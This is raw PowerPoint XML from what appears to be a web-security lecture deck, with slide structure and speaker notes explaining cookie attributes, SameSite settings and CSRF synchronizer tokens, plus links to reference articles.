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4041" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId138"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="356" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="357" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="358" r:id="rId21"/>
    <p:sldId id="359" r:id="rId22"/>
    <p:sldId id="360" r:id="rId23"/>
    <p:sldId id="361" r:id="rId24"/>
    <p:sldId id="362" r:id="rId25"/>
    <p:sldId id="271" r:id="rId26"/>
    <p:sldId id="363" r:id="rId27"/>
    <p:sldId id="378" r:id="rId28"/>
    <p:sldId id="380" r:id="rId29"/>
    <p:sldId id="381" r:id="rId30"/>
    <p:sldId id="409" r:id="rId31"/>
    <p:sldId id="410" r:id="rId32"/>
    <p:sldId id="407" r:id="rId33"/>
    <p:sldId id="408" r:id="rId34"/>
    <p:sldId id="274" r:id="rId35"/>
    <p:sldId id="275" r:id="rId36"/>
    <p:sldId id="422" r:id="rId37"/>
    <p:sldId id="277" r:id="rId38"/>
    <p:sldId id="382" r:id="rId39"/>
    <p:sldId id="279" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="282" r:id="rId42"/>
    <p:sldId id="372" r:id="rId43"/>
    <p:sldId id="411" r:id="rId44"/>
    <p:sldId id="412" r:id="rId45"/>
    <p:sldId id="281" r:id="rId46"/>
    <p:sldId id="289" r:id="rId47"/>
    <p:sldId id="290" r:id="rId48"/>
    <p:sldId id="354" r:id="rId49"/>
    <p:sldId id="324" r:id="rId50"/>
    <p:sldId id="325" r:id="rId51"/>
    <p:sldId id="326" r:id="rId52"/>
    <p:sldId id="327" r:id="rId53"/>
    <p:sldId id="328" r:id="rId54"/>
    <p:sldId id="329" r:id="rId55"/>
    <p:sldId id="330" r:id="rId56"/>
    <p:sldId id="331" r:id="rId57"/>
    <p:sldId id="292" r:id="rId58"/>
    <p:sldId id="413" r:id="rId59"/>
    <p:sldId id="296" r:id="rId60"/>
    <p:sldId id="333" r:id="rId61"/>
    <p:sldId id="297" r:id="rId62"/>
    <p:sldId id="295" r:id="rId63"/>
    <p:sldId id="376" r:id="rId64"/>
    <p:sldId id="414" r:id="rId65"/>
    <p:sldId id="415" r:id="rId66"/>
    <p:sldId id="377" r:id="rId67"/>
    <p:sldId id="418" r:id="rId68"/>
    <p:sldId id="373" r:id="rId69"/>
    <p:sldId id="416" r:id="rId70"/>
    <p:sldId id="374" r:id="rId71"/>
    <p:sldId id="417" r:id="rId72"/>
    <p:sldId id="419" r:id="rId73"/>
    <p:sldId id="375" r:id="rId74"/>
    <p:sldId id="421" r:id="rId75"/>
    <p:sldId id="420" r:id="rId76"/>
    <p:sldId id="423" r:id="rId77"/>
    <p:sldId id="397" r:id="rId78"/>
    <p:sldId id="398" r:id="rId79"/>
    <p:sldId id="399" r:id="rId80"/>
    <p:sldId id="300" r:id="rId81"/>
    <p:sldId id="383" r:id="rId82"/>
    <p:sldId id="384" r:id="rId83"/>
    <p:sldId id="386" r:id="rId84"/>
    <p:sldId id="387" r:id="rId85"/>
    <p:sldId id="388" r:id="rId86"/>
    <p:sldId id="389" r:id="rId87"/>
    <p:sldId id="390" r:id="rId88"/>
    <p:sldId id="364" r:id="rId89"/>
    <p:sldId id="371" r:id="rId90"/>
    <p:sldId id="365" r:id="rId91"/>
    <p:sldId id="366" r:id="rId92"/>
    <p:sldId id="367" r:id="rId93"/>
    <p:sldId id="368" r:id="rId94"/>
    <p:sldId id="301" r:id="rId95"/>
    <p:sldId id="302" r:id="rId96"/>
    <p:sldId id="303" r:id="rId97"/>
    <p:sldId id="369" r:id="rId98"/>
    <p:sldId id="304" r:id="rId99"/>
    <p:sldId id="305" r:id="rId100"/>
    <p:sldId id="391" r:id="rId101"/>
    <p:sldId id="392" r:id="rId102"/>
    <p:sldId id="395" r:id="rId103"/>
    <p:sldId id="394" r:id="rId104"/>
    <p:sldId id="306" r:id="rId105"/>
    <p:sldId id="307" r:id="rId106"/>
    <p:sldId id="308" r:id="rId107"/>
    <p:sldId id="335" r:id="rId108"/>
    <p:sldId id="336" r:id="rId109"/>
    <p:sldId id="337" r:id="rId110"/>
    <p:sldId id="338" r:id="rId111"/>
    <p:sldId id="339" r:id="rId112"/>
    <p:sldId id="340" r:id="rId113"/>
    <p:sldId id="342" r:id="rId114"/>
    <p:sldId id="343" r:id="rId115"/>
    <p:sldId id="310" r:id="rId116"/>
    <p:sldId id="311" r:id="rId117"/>
    <p:sldId id="312" r:id="rId118"/>
    <p:sldId id="344" r:id="rId119"/>
    <p:sldId id="401" r:id="rId120"/>
    <p:sldId id="345" r:id="rId121"/>
    <p:sldId id="346" r:id="rId122"/>
    <p:sldId id="347" r:id="rId123"/>
    <p:sldId id="349" r:id="rId124"/>
    <p:sldId id="350" r:id="rId125"/>
    <p:sldId id="352" r:id="rId126"/>
    <p:sldId id="316" r:id="rId127"/>
    <p:sldId id="317" r:id="rId128"/>
    <p:sldId id="318" r:id="rId129"/>
    <p:sldId id="402" r:id="rId130"/>
    <p:sldId id="403" r:id="rId131"/>
    <p:sldId id="404" r:id="rId132"/>
    <p:sldId id="405" r:id="rId133"/>
    <p:sldId id="406" r:id="rId134"/>
    <p:sldId id="320" r:id="rId135"/>
    <p:sldId id="321" r:id="rId136"/>
    <p:sldId id="322" r:id="rId137"/>
  </p:sldIdLst>
  <p:sldSz cx="10058400" cy="7772400"/>
  <p:notesSz cx="10058400" cy="7772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4025" indent="1588"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1225" indent="1588"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68425" indent="1588"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2450" indent="1588"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5"/>
    <p:restoredTop sz="82500" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="2192"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016A83-6B23-BF47-8A59-A20D5914FA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4359275" cy="388938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB3D216-D6E9-0149-8257-5ABB6A6CEC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5697538" y="0"/>
            <a:ext cx="4359275" cy="388938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BEE1A7D5-B9A7-7241-9BF1-9A3021105695}" type="datetimeFigureOut">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/10/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7195F0D5-09B8-A54E-A6D5-D7241A038DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143250" y="582613"/>
            <a:ext cx="3771900" cy="291465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3E362A1D-72CE-4A43-AD45-589B5DC66815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006475" y="3692525"/>
            <a:ext cx="8045450" cy="3497263"/>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7F3FB024-4BBD-5244-8AF8-AEBBCDBB6C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7381875"/>
            <a:ext cx="4359275" cy="388938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D500A400-C4AF-CA44-84CC-DCEF8F734E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5697538" y="7381875"/>
            <a:ext cx="4359275" cy="38893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83291B6-5FE6-1A42-A459-F36199AF9227}"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Cross-site_request_forger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ross-site_request_forger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ross-site_request_forgery"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Cross-site_request_forger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owasp.org/index.php/SameSit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owasp.org/index.php/SameSit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owasp.org/index.php/SameSit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owasp.org/index.php/SameSite"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www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/"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etsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/"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web.dev/samesite-cookies-explained/"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etsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/"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web.dev/samesite-cookies-explained/"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etsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/"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web.dev/samesite-cookies-explained/"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etsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/"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web.dev/samesite-cookies-explained/"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otes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5875FC32-C094-8B45-9823-8D3AA3C3D4A4}"/>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otes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D282C2-0BA2-3649-A383-6DE44738736E}"/>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dirty="0"/>
              <a:t>The ‘domain‘ attribute signifies the domain for which the cookie is valid and can be submitted with every request for this domain or its subdomains. If this attribute is not specified, then the hostname of the originating server is used as the default value. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" err="1"/>
              <a:t>paladion.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>/cookie-attributes-and-their-importance/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1638B5-F579-1A4B-B5E9-A18B01605BD2}"/>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The ‘domain‘ attribute signifies the domain for which the cookie is valid and can be submitted with every request for this domain or its subdomains. If this attribute is not specified, then the hostname of the originating server is used as the default value. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t>https://paladion.net/cookie-attributes-and-their-importance/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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 that are set on your browser by a domain that you don’t visit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{383291B6-5FE6-1A42-A459-F36199AF9227}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282700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CC9FE4E1-2BE4-6C4B-9D4A-01821B0A29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559FC248-4501-7147-A0A2-44C7154E64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https://avicoder.me/2016/02/22/SSLstrip-for-newbies/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C853C17-DC52-5E41-BC00-5E358478CE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C8803F3-EDB0-EF40-BB62-958F3B0B5865}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>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5B016BA0-5244-D943-88A5-F36C9A72C3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973B7053-02D0-6E4C-90A6-B2EB03A70D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https://avicoder.me/2016/02/22/SSLstrip-for-newbies/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F0EB070-7883-3840-BC7F-4DC0DFAC69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3AEA9-0B07-F64E-9150-71F22729D098}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>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2C3ED6A6-408A-4343-9011-BD13F90780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0B2C81C3-D290-514E-A160-5132378392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https://medium.com/@charithra/introduction-to-csrf-a329badfca49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755AC26A-D21F-5B4E-9ED3-FBD9D19080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110C052-3717-8B47-A79C-DB535196308B}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>52</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64EAAC9B-E282-4F40-80CF-8148731B2B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CD7092F6-B3B6-4140-A977-02BBA43B50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https://medium.com/@charithra/introduction-to-csrf-a329badfca49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01FA96A-7E56-2C45-BD70-C91DE5FAC6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59DF6-CFDF-CD43-80ED-EF69EE55BC20}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>53</a:t>
            </a:fld>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6EB577EE-ECE1-9945-BFF1-F3710D4359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D147B1E5-E066-074F-A302-30A54F5B86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STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. As the token is unique and unpredictable, it also enforces proper sequence of events (e.g. screen 1, then 2, then 3) which raises usability problem (e.g. user opens multiple tabs). It can be relaxed by using per session CSRF token instead of per request CSRF token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cross-site_request_forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BC3D4D-C7FF-D54D-B4B6-4B82A24D52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5C1FBD-CDC5-7944-A3CC-961587AE0D93}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>60</a:t>
            </a:fld>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E5078EAB-D7C2-C446-951D-B493E79877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F31FE757-6013-EF4A-B6D5-E8BB146029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STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. As the token is unique and unpredictable, it also enforces proper sequence of events (e.g. screen 1, then 2, then 3) which raises usability problem (e.g. user opens multiple tabs). It can be relaxed by using per session CSRF token instead of per request CSRF token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cross-site_request_forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A747D291-1657-B549-8F94-7C9CE28C2A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789558-D2E7-794D-AEBE-6F66F88645E5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>61</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DC5205DA-3B5F-7B45-B6CB-622DCEB8D6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6E03DACA-4389-1549-B8AB-8FD5752486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STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. As the token is unique and unpredictable, it also enforces proper sequence of events (e.g. screen 1, then 2, then 3) which raises usability problem (e.g. user opens multiple tabs). It can be relaxed by using per session CSRF token instead of per request CSRF token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cross-site_request_forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260DA28A-84DC-A34C-B4F7-C089357999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AD3B5F-04BE-834A-A006-7B66F0805446}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>62</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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137290E3-B0A6-A14B-AD5F-323249B6ACF6}"/>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29BEFADF-7748-464F-8064-60FE81AFE4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F1DB6CD1-950C-4149-80F9-140BF03105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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cross-site_request_forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98308" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D70EBD-EDED-B142-96C1-40EC533C21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7F128ED-F836-BC47-8440-21C22F92ABE0}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>63</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1DE819A9-725C-594C-8891-CEB8211283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0838DBD5-A2B4-D143-9223-2FB939A35D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a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage. It also provides some protection against cross-site request forgery attacks. Possible values for the flag are lax or strict.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> receive the session cookie and the user will not be able to access the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the strict flag would be most appropriate here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The default lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods (e.g. POST).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>As of November 2017 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> attribute is implemented in Chrome, Firefox, and Opera. Since version 12.1 Safari also supports this. Windows 7 with IE 11 lacks support as of December 2018, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>caniuse.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SameSite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101380" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
